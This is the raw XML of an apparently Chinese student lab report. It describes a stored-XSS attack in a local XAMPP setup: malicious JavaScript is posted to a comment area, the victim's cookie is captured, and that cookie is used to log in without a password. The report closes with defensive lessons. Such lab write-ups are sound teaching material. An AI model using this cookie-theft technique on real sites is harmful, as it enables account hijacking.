          <w:p w:rsidR="00051FF4" w:rsidRDefault="00051FF4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522739" w:rsidRDefault="00522739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51FF4" w:rsidRPr="00522739" w:rsidRDefault="00E85B6B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我们首先将该语句上传到网站的</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>XSS (Stored)</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>评论区，接着用</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Edge</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器重新登陆，模拟受害者，去打开</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>XSS (Stored)</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>评论区，可以看到恶意的</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>代码立即被受害者浏览器执行。</w:t>
            </w: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52857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2710</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5939790" cy="924560"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="889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522739" w:rsidRDefault="00522739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Pr="00522739" w:rsidRDefault="00DC6FD7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可以看到受害者的</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>已被捕获到</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DC6FD7" w:rsidRDefault="00DC6FD7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B7A5F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53670</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5939790" cy="1019810"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="889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Pr="00522739" w:rsidRDefault="00F60093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然后我们</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>切换到</w:t>
            </w:r>
            <w:r w:rsidR="0095716C" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>谷歌</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，模拟攻击者使用受害者</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登陆</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0095716C" w:rsidRDefault="008F16EF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6EA470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46990</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2926080" cy="2825965"/>
                  <wp:effectExtent l="0" t="0" r="762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70" cy="283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16C" w:rsidRDefault="0095716C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95716C" w:rsidRDefault="0095716C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95716C" w:rsidRDefault="0095716C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74D61" w:rsidRDefault="00074D61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74D61" w:rsidRDefault="00074D61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Pr="00522739" w:rsidRDefault="008F16EF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可以看到顺利跳过密码实现登陆</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F16EF" w:rsidRDefault="008F16EF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074D61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8590609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176530</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4497240" cy="272796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240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6B" w:rsidRP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51FF4" w:rsidRDefault="00051FF4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51FF4" w:rsidRPr="00E85B6B" w:rsidRDefault="00051FF4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A4DA6" w:rsidRDefault="000A4DA6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A4DA6" w:rsidRDefault="000A4DA6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A4DA6" w:rsidRDefault="000A4DA6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A4DA6" w:rsidRDefault="000A4DA6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A4DA6" w:rsidRDefault="000A4DA6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B358B0" w:rsidRPr="00077894" w:rsidRDefault="00B358B0" w:rsidP="0007789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</w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2737B" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="9172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9567" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
          </w:tcPr>
          <w:p w:rsidR="00C8772A" w:rsidRPr="00C8772A" w:rsidRDefault="00AB5D19" w:rsidP="00C877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:rsidR="000A4DA6" w:rsidRDefault="000A4DA6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  <w:szCs w:val="51"/>
              </w:rPr>
            </w:pP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问题和解决方法</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A4DA6" w:rsidRPr="000815B9" w:rsidRDefault="00BE5AE5" w:rsidP="00305E67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>问题：手上只有一台主机</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004060D6" w:rsidRPr="000815B9" w:rsidRDefault="00BE5AE5" w:rsidP="00305E67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>解决方法：使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>xampp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>既充当被攻击网站，又充当攻击者接收</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>服务器。用</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Edge</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器模拟</w:t>
            </w:r>
            <w:r w:rsidR="000F0D53" w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>被害者，</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="000F0D53" w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>用谷歌浏览器</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="000F0D53" w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>模拟攻击者。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004060D6" w:rsidRDefault="004060D6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815B9" w:rsidRDefault="000815B9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815B9" w:rsidRDefault="000815B9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815B9" w:rsidRDefault="000815B9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A4DA6" w:rsidRDefault="000A4DA6" w:rsidP="00305E67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312" w:hAnsi="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A4DA6" w:rsidRPr="000815B9" w:rsidRDefault="00EB6536" w:rsidP="00305E67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过这次实验，我深入理解了</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SS</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>攻击的原理，特别是存储型</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SS</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>攻击。存储型</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SS</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>攻击对用户可以说是防不胜防的，只能靠网站开发者提高安全意识，对于任何用户的提交都要仔细审查，才能防止这种攻击手段。</w:t>
            </w:r>
            <w:r w:rsidR="000815B9" w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>同时，我们应该慎用下一次自动登录这种采用</w:t>
            </w:r>
            <w:r w:rsidR="000815B9" w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A4DA6" w:rsidRPr="000815B9" w:rsidRDefault="000815B9" w:rsidP="00305E67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的技术或及时更新自己的</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A4DA6" w:rsidRDefault="000A4DA6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A4DA6" w:rsidRDefault="000A4DA6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815B9" w:rsidRDefault="000815B9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815B9" w:rsidRDefault="000815B9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C8772A" w:rsidRDefault="000A4DA6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  <w:szCs w:val="51"/>
              </w:rPr>
            </w:pP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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000815B9" w:rsidRPr="00F97702" w:rsidRDefault="000815B9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 w:rsidRPr="000815B9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2737B" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="2459"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9567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E85B6B" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="612"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1183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7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F26" w:rsidRDefault="00746F26">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00746F26" w:rsidRDefault="0074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9666C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F26" w:rsidRDefault="00746F26">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00746F26" w:rsidRDefault="00746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A44B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C85AA286"/>
    <w:lvl w:ilvl="0" w:tplc="8CBA58C0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543E1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8223DF4"/>
    <w:lvl w:ilvl="0" w:tplc="B98CB6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64042E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="248EE0F2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F182BA0">
      <w:start w:val="3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65163B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E194ACD0"/>
    <w:lvl w:ilvl="0" w:tplc="7F1244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7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13955"/>
    <w:rsid w:val="000431D7"/>
    <w:rsid w:val="00051FF4"/>
    <w:rsid w:val="00060844"/>
    <w:rsid w:val="00074D61"/>
    <w:rsid w:val="00077894"/>
    <w:rsid w:val="000815B9"/>
    <w:rsid w:val="0009666C"/>
    <w:rsid w:val="000A4DA6"/>
    <w:rsid w:val="000E16A2"/>
    <w:rsid w:val="000F0D53"/>
    <w:rsid w:val="000F145C"/>
    <w:rsid w:val="00107222"/>
    <w:rsid w:val="001365C9"/>
    <w:rsid w:val="00137AE1"/>
    <w:rsid w:val="001411FE"/>
    <w:rsid w:val="002332C1"/>
    <w:rsid w:val="002A5D9A"/>
    <w:rsid w:val="002E15DA"/>
    <w:rsid w:val="002F174A"/>
    <w:rsid w:val="00305E67"/>
    <w:rsid w:val="00353F37"/>
    <w:rsid w:val="00354199"/>
    <w:rsid w:val="003630FB"/>
    <w:rsid w:val="00390E00"/>
    <w:rsid w:val="003A649C"/>
    <w:rsid w:val="003C181E"/>
    <w:rsid w:val="004060D6"/>
    <w:rsid w:val="00416A14"/>
    <w:rsid w:val="004443AF"/>
    <w:rsid w:val="00446681"/>
    <w:rsid w:val="0046686E"/>
    <w:rsid w:val="00476838"/>
    <w:rsid w:val="00521780"/>
    <w:rsid w:val="00522739"/>
    <w:rsid w:val="00550F1B"/>
    <w:rsid w:val="00555C6B"/>
    <w:rsid w:val="0056673A"/>
    <w:rsid w:val="005778EC"/>
    <w:rsid w:val="0058024F"/>
    <w:rsid w:val="00594542"/>
    <w:rsid w:val="005B2517"/>
    <w:rsid w:val="005B3380"/>
    <w:rsid w:val="00673C74"/>
    <w:rsid w:val="00687D0B"/>
    <w:rsid w:val="00696947"/>
    <w:rsid w:val="00746F26"/>
    <w:rsid w:val="00762C6F"/>
    <w:rsid w:val="00792B52"/>
    <w:rsid w:val="007D0FFD"/>
    <w:rsid w:val="008D527F"/>
    <w:rsid w:val="008F16EF"/>
    <w:rsid w:val="00914846"/>
    <w:rsid w:val="00936AF3"/>
    <w:rsid w:val="0095716C"/>
    <w:rsid w:val="00963765"/>
    <w:rsid w:val="009835D9"/>
    <w:rsid w:val="009A5750"/>
    <w:rsid w:val="009B3805"/>
    <w:rsid w:val="009D78ED"/>
    <w:rsid w:val="009F2D88"/>
    <w:rsid w:val="009F6E65"/>
    <w:rsid w:val="00A224E3"/>
    <w:rsid w:val="00A7447E"/>
    <w:rsid w:val="00A84902"/>
    <w:rsid w:val="00AB0268"/>
    <w:rsid w:val="00AB5D19"/>
    <w:rsid w:val="00AD380D"/>
    <w:rsid w:val="00B17515"/>
    <w:rsid w:val="00B33B67"/>
    <w:rsid w:val="00B358B0"/>
    <w:rsid w:val="00B82D65"/>
    <w:rsid w:val="00BE5AE5"/>
    <w:rsid w:val="00C57AB6"/>
    <w:rsid w:val="00C74779"/>
    <w:rsid w:val="00C77491"/>
    <w:rsid w:val="00C80EFF"/>
    <w:rsid w:val="00C8772A"/>
    <w:rsid w:val="00CD1110"/>
    <w:rsid w:val="00D060F8"/>
    <w:rsid w:val="00D66B98"/>
    <w:rsid w:val="00DC4E13"/>
    <w:rsid w:val="00DC6FD7"/>
    <w:rsid w:val="00DE57FE"/>
    <w:rsid w:val="00DF6D25"/>
    <w:rsid w:val="00E0064D"/>
    <w:rsid w:val="00E07D32"/>
    <w:rsid w:val="00E30130"/>
    <w:rsid w:val="00E40FF9"/>
    <w:rsid w:val="00E529AD"/>
    <w:rsid w:val="00E669EB"/>
    <w:rsid w:val="00E707D0"/>
    <w:rsid w:val="00E84442"/>
    <w:rsid w:val="00E85B6B"/>
    <w:rsid w:val="00EA61EF"/>
    <w:rsid w:val="00EB6536"/>
    <w:rsid w:val="00EC423B"/>
    <w:rsid w:val="00EC52EF"/>
    <w:rsid w:val="00F24A28"/>
    <w:rsid w:val="00F2737B"/>
    <w:rsid w:val="00F60093"/>
    <w:rsid w:val="00F64E6F"/>
    <w:rsid w:val="00F90090"/>
    <w:rsid w:val="00F95585"/>
    <w:rsid w:val="00F97702"/>
    <w:rsid w:val="00FA32B5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C325B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rsid w:val="003630FB"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001411F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11FE"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00051FF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00051FF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="javascript">
    <w:name w:val="javascript"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00051FF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00051FF4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0005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/cookie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25E70-0722-492C-A39B-1B20AB7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Claymore</cp:lastModifiedBy>
  <cp:revision>39</cp:revision>
  <cp:lastPrinted>2007-04-05T23:49:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-12T03:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-24T00:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>